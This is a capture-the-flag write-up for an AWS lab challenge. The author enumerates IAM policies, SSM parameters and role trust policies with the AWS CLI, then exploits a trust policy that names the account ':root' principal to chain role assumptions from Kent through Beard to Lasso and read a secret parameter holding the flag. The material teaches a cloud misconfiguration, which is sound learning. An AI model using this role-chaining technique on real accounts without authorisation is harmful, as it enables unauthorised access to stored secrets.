You’ve just gained access to the role Kent. Can you get to the root flag in the SSM parameter store?
Short and concise challenge details, I will start by preparing a profile for ramos, and checking which policies are attached to it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| adicpnn@laboratory cloud % cat ~/.aws/config| tail
[profile kent]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/Kent
source_profile = cloudfoxable
adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name Kent --profile cloudfoxable
{
"AttachedPolicies": [
{
"PolicyName": "root-policy1",
"PolicyArn": "arn:aws:iam::129323993607:policy/root-policy1"
}
]
}
|
A single policy attached, let’s see what type of access it grants.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/root-policy1 --version-id v1 --profile cloudfoxable
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"sts:AssumeRole"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2026-03-11T15:43:57+00:00"
}
}
|
Hmm, I’ve been given AssumeRole permissions. This means I need to find another role that has access to the target secret. Let me first find out more details about this secret. There’s several parameters in the SSM store, but only one with root in it’s name.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
| adicpnn@laboratory cloud % aws ssm describe-parameters --profile cloudfoxable
{
"Parameters": [
{
"Name": "/cloudfoxable/flag/executioner",
"ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/cloudfoxable/flag/executioner",
"Type": "SecureString",
"KeyId": "alias/aws/ssm",
"LastModifiedDate": "2026-03-11T16:43:57.689000+01:00",
"LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
"Version": 1,
"Tier": "Standard",
"Policies": [],
"DataType": "text"
},
{
"Name": "/cloudfoxable/flag/its-a-secret",
"ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/cloudfoxable/flag/its-a-secret",
"Type": "SecureString",
"KeyId": "alias/aws/ssm",
"LastModifiedDate": "2026-03-11T16:43:57.734000+01:00",
"LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
"Version": 1,
"Tier": "Standard",
"Policies": [],
"DataType": "text"
},
{
"Name": "/cloudfoxable/flag/its-another-secret",
"ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/cloudfoxable/flag/its-another-secret",
"Type": "SecureString",
"KeyId": "alias/aws/ssm",
"LastModifiedDate": "2026-03-11T16:43:57.583000+01:00",
"LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
"Version": 1,
"Tier": "Standard",
"Policies": [],
"DataType": "text"
},
{
"Name": "/cloudfoxable/flag/lambda-sqs",
"ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/cloudfoxable/flag/lambda-sqs",
"Type": "SecureString",
"KeyId": "alias/aws/ssm",
"LastModifiedDate": "2026-03-11T16:43:57.348000+01:00",
"LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
"Version": 1,
"Tier": "Standard",
"Policies": [],
"DataType": "text"
},
{
"Name": "/production/CICD/root",
"ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root",
"Type": "SecureString",
"KeyId": "alias/aws/ssm",
"LastModifiedDate": "2026-03-11T16:43:57.575000+01:00",
"LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
"Version": 1,
"Tier": "Standard",
"Policies": [],
"DataType": "text"
},
|
Let’s see if there’s any resource policy attached to it.
1
2
3
| adicpnn@laboratory cloud % aws ssm get-resource-policies --resource-arn arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root --profile cloudfoxable
aws: [ERROR]: An error occurred (AccessDeniedException) when calling the GetResourcePolicies operation: User: arn:aws:iam::129323993607:user/ctf-starting-user is not authorized to perform: ssm:GetResourcePolicies on resource: arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root because no identity-based policy allows the ssm:GetResourcePolicies action
|
Looks like this is not something I can easily find out. I’ll have to take another route, looking for what roles Kent might assume, then go from there.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
| adicpnn@laboratory cloud % aws iam list-roles --profile cloudfoxable | jq '.Roles | map({Arn,AssumeRolePolicyDocument})'
[
{
"Arn": "arn:aws:iam::129323993607:role/aaronson",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
},
{
"Arn": "arn:aws:iam::129323993607:role/Alexander-Arnold",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::129323993607:user/ctf-starting-user"
},
"Action": "sts:AssumeRole"
}
]
}
},
{
"Arn": "arn:aws:iam::129323993607:role/Beard",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::129323993607:root"
},
"Action": "sts:AssumeRole"
}
]
}
},
{
"Arn": "arn:aws:iam::129323993607:role/Kent",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::129323993607:user/ctf-starting-user"
},
"Action": "sts:AssumeRole"
}
]
}
},
...
]
|
Note the output of my previous command was truncated for readability. Looking at the results, there’s no single role that explicitly allows the Kent principal to assume it, but there’s another interesting thing.
Quoting the AWS Documentation, referencing :root in an IAM role’s trust policy might not be self explanatory:
Important: If you reference :root in an IAM role’s trust policy, you might allow more principals to assume your role than you intended, so it’s a best practice to use the Principal element or conditions to only allow specific principals or paths to assume a role.
Note: The suffix :root in the policy’s Principal element equates to the principals in the account, not the root user of that account.
This should mean that the role “Beard” can be assumed by any principal in this account! Note that this is not the case of an explicit allow, and any principal wishing to assume this role must also have an implicit Allow statement in one of it’s attached policies for this type of action. Fortunately, the Kent role has this implicit allow statement we observed earlier on.
The next step should be straight forward, go and assume the role of Beard. I went ahead and created another profile for this role, this time setting the starting_profile variable to the kent profile.
1
2
3
4
5
6
7
8
9
10
11
12
13
| adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile beard]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/Beard
source_profile = kent
adicpnn@laboratory cloud % aws sts get-caller-identity --profile beard
{
"UserId": "AROAR4HCPRID7WWVC6H2G:botocore-session-1773311164",
"Account": "129323993607",
"Arn": "arn:aws:sts::129323993607:assumed-role/Beard/botocore-session-1773311164"
}
|
Now I have this role assumed, but I have no clue what permissions it has.
1
2
3
4
| adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name Beard --profile cloudfoxable
{
"AttachedPolicies": []
}
|
No policies? Maybe I missed something …
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| adicpnn@laboratory cloud % aws iam list-roles --profile cloudfoxable | jq '.Roles | map({Arn,AssumeRolePolicyDocument})'
...
{
"Arn": "arn:aws:iam::129323993607:role/Lasso",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::129323993607:role/Beard"
},
"Action": "sts:AssumeRole"
}
]
}
},
...
|
Aha! There’s another role, assumable only by Beard, this time with an explicit allow statement.
1
2
3
4
5
6
7
8
9
10
11
12
13
| adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile lasso]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/Lasso
source_profile = beard
adicpnn@laboratory cloud % aws sts get-caller-identity --profile lasso
{
"UserId": "AROAR4HCPRIDXLNPL22DM:botocore-session-1773311403",
"Account": "129323993607",
"Arn": "arn:aws:sts::129323993607:assumed-role/Lasso/botocore-session-1773311403"
}
|
I proceed again with finding information on what permissions this new role has.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name Lasso --profile cloudfoxable
{
"AttachedPolicies": [
{
"PolicyName": "important-policy",
"PolicyArn": "arn:aws:iam::129323993607:policy/important-policy"
}
]
}
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/important-policy --version-id v1 --profile cloudfoxable
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": "ssm:GetParameter",
"Effect": "Allow",
"Resource": "arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2026-03-11T15:44:04+00:00"
}
}
|
That’s it, I’ve reached the point where I can access the target.
Execution#
1
2
3
4
5
6
7
8
9
10
11
| {
"Parameter": {
"Name": "/production/CICD/root",
"Type": "SecureString",
"Value": "FLAG{root::ExploitingRoleTrustsIsFun}",
"Version": 1,
"LastModifiedDate": "2026-03-11T16:43:57.575000+01:00",
"ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root",
"DataType": "text"
}
}
|